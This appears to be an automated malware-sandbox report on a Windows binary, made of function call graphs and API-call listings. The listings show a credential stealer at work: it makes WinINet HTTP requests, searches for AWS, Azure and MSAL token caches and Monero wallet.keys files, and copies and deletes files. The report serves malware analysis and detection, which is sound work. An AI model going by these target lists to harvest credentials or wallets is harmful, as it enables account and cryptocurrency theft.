                                    control_flow_graph 2378 1848d0-184992 call 19a170 call 184800 call 19a110 * 5 InternetOpenA StrCmpCA 2393 18499b-18499f 2378->2393 2394 184994 2378->2394 2395 184f1b-184f43 InternetCloseHandle call 19a4a0 call 189b10 2393->2395 2396 1849a5-184b1d call 198600 call 19a2f0 call 19a270 call 19a1d0 * 2 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a2f0 call 19a270 call 19a1d0 * 2 InternetConnectA 2393->2396 2394->2393 2406 184f82-184ff2 call 198430 * 2 call 19a170 call 19a1d0 * 8 2395->2406 2407 184f45-184f7d call 19a1f0 call 19a380 call 19a270 call 19a1d0 2395->2407 2396->2395 2482 184b23-184b27 2396->2482 2407->2406 2483 184b29-184b33 2482->2483 2484 184b35 2482->2484 2485 184b3f-184b72 HttpOpenRequestA 2483->2485 2484->2485 2486 184b78-184e78 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a110 call 19a2f0 * 2 call 19a270 call 19a1d0 * 2 call 19a4a0 lstrlen call 19a4a0 * 2 lstrlen call 19a4a0 HttpSendRequestA 2485->2486 2487 184f0e-184f15 InternetCloseHandle 2485->2487 2598 184e82-184eac InternetReadFile 2486->2598 2487->2395 2599 184eae-184eb5 2598->2599 2600 184eb7-184f09 InternetCloseHandle call 19a1d0 2598->2600 2599->2600 2601 184eb9-184ef7 call 19a380 call 19a270 call 19a1d0 2599->2601 2600->2487 2601->2598
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                      • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                      • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00184965
                                    • StrCmpCA.SHLWAPI(?,013AE450), ref: 0018498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001A0DC3,00000000,?,?,00000000,?,",00000000,?,013AE4E0), ref: 00184E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00184E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00184E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00184E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00184EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00184F15
                                    • HttpOpenRequestA.WININET(00000000,013AE470,?,013ADA48,00000000,00000000,00400100,00000000), ref: 00184B65
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • InternetCloseHandle.WININET(00000000), ref: 00184F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: f96a5b23808d613e23bcc8e8e9eba70bcc5b11f98fb8eb1a32c7ece449648f30
                                    • Instruction ID: 6d03277b007b98cef89238463de9256d949f376dcb56a3a28064c0b2e3cccdbe
                                    • Opcode Fuzzy Hash: f96a5b23808d613e23bcc8e8e9eba70bcc5b11f98fb8eb1a32c7ece449648f30
                                    • Instruction Fuzzy Hash: 45129C71910118AACF15EB94DC52FEEB779BF65300F9041A9B506624A1EF706F4CCFA2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • RegOpenKeyExA.KERNEL32(00000000,013AA9E0,00000000,00020019,00000000,001A05A6), ref: 00197E44
                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
                                    • wsprintfA.USER32 ref: 00197EF9
                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00197F39
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 01597248142f5891f5da161a5b2a5416d23255223533ae695921bd071f32b6ba
                                    • Instruction ID: b3af9fcfd9bab08d03846a661d9f784516d3c2a29611f3ef2318bfa1a0d26e41
                                    • Opcode Fuzzy Hash: 01597248142f5891f5da161a5b2a5416d23255223533ae695921bd071f32b6ba
                                    • Instruction Fuzzy Hash: 8C81F971910118ABDF29DB54CD95FEAB7B8BF18700F408298E10AA6190DF716B89CFE1
                                    APIs
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
                                      • Part of subcall function 00184800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
                                      • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                      • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
                                    • StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0018644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001864BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0018653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00186549
                                    • InternetCloseHandle.WININET(00000000), ref: 00186553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 1aaadd2c8561814b94faf29d8e19ce831982d049f427c544704a945a0bce46c0
                                    • Instruction ID: a3c256456a0845368e95c36b424f923ea768c6583bb014f130e6baaeca5375ae
                                    • Opcode Fuzzy Hash: 1aaadd2c8561814b94faf29d8e19ce831982d049f427c544704a945a0bce46c0
                                    • Instruction Fuzzy Hash: 8E713C71A00218ABDF14EBA0CC59BEEB778BF55700F508199F50A6B194DBB46A88CF91
                                    APIs
                                      • Part of subcall function 0019A1F0: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DC6), ref: 0019A1FB
                                      • Part of subcall function 0019A1F0: lstrcpy.KERNEL32(001A0DC6,00000000), ref: 0019A255
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195124
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195181
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195337
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00194CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00194D08
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00194DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00194DF8
                                      • Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E0F
                                      • Part of subcall function 00194DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00194E44
                                      • Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E63
                                      • Part of subcall function 00194DA0: lstrlen.KERNEL32(00000000), ref: 00194E8E
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0019526B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195420
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001954EC
                                    • Sleep.KERNEL32(0000EA60), ref: 001954FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 84f528f337ce04accaeffaa34f0055a851f97e6e461006572e78515585c38411
                                    • Instruction ID: 671d92f90a7855c07c78b59bc7830f2f5169c493427489b77cdb93148054dc58
                                    • Opcode Fuzzy Hash: 84f528f337ce04accaeffaa34f0055a851f97e6e461006572e78515585c38411
                                    • Instruction Fuzzy Hash: EEE11F72910104AACF15FBA4EC96EED773DAF65300F808528B507661A1EF746B4DCBE2
                                    APIs
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                    • lstrcat.KERNEL32(?,00000000), ref: 00194890
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 001948AD
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
                                      • Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019491C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00194939
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
                                      • Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
                                      • Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672
                                    • lstrcat.KERNEL32(?,00000000), ref: 001949A8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001949C5
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 00194490
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A08BA), ref: 001944A5
                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 001944C2
                                      • Part of subcall function 001943F0: PathMatchSpecA.SHLWAPI(?,?), ref: 001944FE
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,013AE500), ref: 0019452A
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FC8), ref: 0019453C
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194550
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,001A0FCC), ref: 00194562
                                      • Part of subcall function 001943F0: lstrcat.KERNEL32(?,?), ref: 00194576
                                      • Part of subcall function 001943F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0019458C
                                      • Part of subcall function 001943F0: DeleteFileA.KERNEL32(?), ref: 00194611
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 8cd8a3285fc0078e933a9d7fb8be2bb03d673576115c3b60f159f0c379c0f0af
                                    • Instruction ID: 8f87280017fd09cda39b14dd2c6de0a470b2c90051cbddaec587e73c3b88e15a
                                    • Opcode Fuzzy Hash: 8cd8a3285fc0078e933a9d7fb8be2bb03d673576115c3b60f159f0c379c0f0af
                                    • Instruction Fuzzy Hash: 7D4162BA9402046BDB24F770EC47FDD773C9B66704F404594B689A60C1EFB45B898BA2
                                    APIs
                                      • Part of subcall function 001812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                      • Part of subcall function 001812A0: RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                      • Part of subcall function 001812A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                      • Part of subcall function 001812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                      • Part of subcall function 001812A0: RegCloseKey.ADVAPI32(?), ref: 001812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0018134F
                                    • lstrlen.KERNEL32(?), ref: 0018135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00181377
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00198600: GetSystemTime.KERNEL32(001A0E02,013A9C08,001A059E,?,?,001813F9,?,0000001A,001A0E02,00000000,?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 00198626
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00181465
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                      • Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                      • Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                      • Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                      • Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                      • Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                    • DeleteFileA.KERNEL32(00000000), ref: 001814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
